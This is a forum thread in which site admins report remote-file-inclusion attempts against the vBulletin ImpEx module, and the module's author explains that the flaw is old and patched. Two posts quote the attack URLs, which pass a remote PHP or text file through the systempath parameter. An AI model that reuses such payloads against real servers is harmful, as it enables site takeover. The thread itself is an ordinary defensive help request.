Announcement

Collapse
No announcement yet.

Impex Module Attack

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Impex Module Attack

    I had the following issue occur yesterday on my forum. From what it appears someone try to exploit the Impexdata module to include a file from a remote host.

    The IP has been banned, but the path below was posted and a few png fiels from user were uploaded. These files were scanned and found be infected.

    See below:

    /forums/index.php/impex/ImpExData.php?systempath=http://www.example.com/images/saves.php.

    Is this a hole that exists in the module, do I need to be concerned and what can I do to prevent this from happening in the future?

    Thx
    Jerry
    Senior Member
    Last edited by Jerry; Fri 2 Jan '09, 3:29pm. Reason: URL taken out

  • #2
    This bug is very old, and fixed several years ago.

    ImpEx should always been removed from a system once the import is done and the latest version used for every consecutive import.
    I wrote ImpEx.

    Blog | Me

    Comment


    • #3
      Ok, thanks, from what I read it was an old bug, but just wanted to verify.

      thx

      Comment


      • #4
        Originally posted by gphillips View Post
        Ok, thanks, from what I read it was an old bug, but just wanted to verify.

        thx
        Always best
        I wrote ImpEx.

        Blog | Me

        Comment


        • #5
          We just had some also, with a slight variation. Ours look like this:

          Code:
          ..../ForumVB/index.php/impex/ImpExModule.php?systempath=http://www.henneferkanuteam.de/apboard/info.txt????

          Comment


          • #6
            Still, that bug is 4 years old now.

            Comment


            • #7
              Another good reminder to do and import, clean it up, finalise it and then remove ImpEx, as with the speed of updates there will likely be an updated version before you want to do another system import or merge.
              I wrote ImpEx.

              Blog | Me

              Comment

              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
              Working...
              X